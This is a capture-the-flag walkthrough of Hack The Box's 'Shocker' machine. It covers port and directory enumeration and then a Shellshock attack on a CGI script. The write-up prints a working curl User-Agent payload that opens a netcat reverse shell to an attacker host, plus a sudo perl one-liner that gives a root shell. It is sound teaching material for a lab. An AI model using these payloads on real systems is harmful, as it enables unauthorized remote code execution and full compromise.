Shocker

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.56 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

As we see, only port 80 and port 2222 are open.

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p80,2222 10.10.10.56 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

So we have an HTTP service on port 80 and an SSH service on port 2222. If you search for OpenSSH 7.2p2 in exploit-db you will find some exploits you can try, but I anticipate to you that none of those exploits are going to work.

So let's take a look at the website.

There's not much going on... And if we list directories with gobuster we won't see much either.

gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of current threads, in this case 200 threads.

By default, gobuster will append each line of the wordlist to the end of the URL, but sometimes directories of a web page end with the / sign. Luckily for us, gobuster has the -f option, which appends the / sign to the end of the URL. Let's try it.

gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -f

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of current threads, in this case 200 threads.

  • -f append / to each request.

And we get a few directories. Let's take a look at the /cgi-bin/ directory.

The /cgi-bin/ directory stores scripts that will interact with the web browser. This scripts could have extensions such as .cgi, .sh, .py, .pl, etc...

As attackers, whenever cgi is presented to us, we have to think of shellshock attacks. The following article explains very well how shellshock attacks work:

https://blog.cloudflare.com/inside-shellshock/

It looks like we can not see what is inside the directory. But that doesn't stop us from trying to list scripts inside that directory.

gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x cgi,sh,py,pl

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of current threads, in this case 200 threads.

  • -x file extensions to search for.

Exploitation

Gobuster found the user.sh file. Let's try to do a shellshock attack with curl. All we have to do is set the User-Agent to () { :; }; command in order to get remote code execution. The command will spawn a reverse shell with netcat.

I recommend taking a look at the following site if you ever want to establish a reverse shell:

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

First of all, let's set a netcat listener.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

If now we do the shellshock attack, we should get a reverse shell as the user shelly, and then we could grab the user flag.

curl -A "() { :;}; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 4444 >/tmp/f'" http://10.10.10.56/cgi-bin/user.sh

  • -A sets the User-Agent.

Privilege Escalation

Whenever a get I shell, I always like to set an interactive TTY shell.

Then I press Ctrl+Z and execute the following command:

stty raw -echo; fg

Finally, I set the proper dimensions:

stty size

shelly@Shocker:/usr/lib/cgi-bin$ stty rows 51 columns 236

Now we have a proper shell to work with. Let's start the privilege escalation phase listing the sudo privileges of the shelly user.

sudo -l

  • -l list user privileges.

So the user shelly can run perl with sudo privileges.

GTFOBins is a great list of binaries that can be used to escalate privileges if you have the right permissions:

https://gtfobins.github.io/

If we search for perl in the GTFOBins list, we can see that we can spawn a shell as root with the sudo privilege running the following command:

sudo perl -e 'exec "/bin/sh";'

And indeed, we get a shell as the root user. All we have to do now is reap the harvest and grab the root flag.

Last updated

Was this helpful?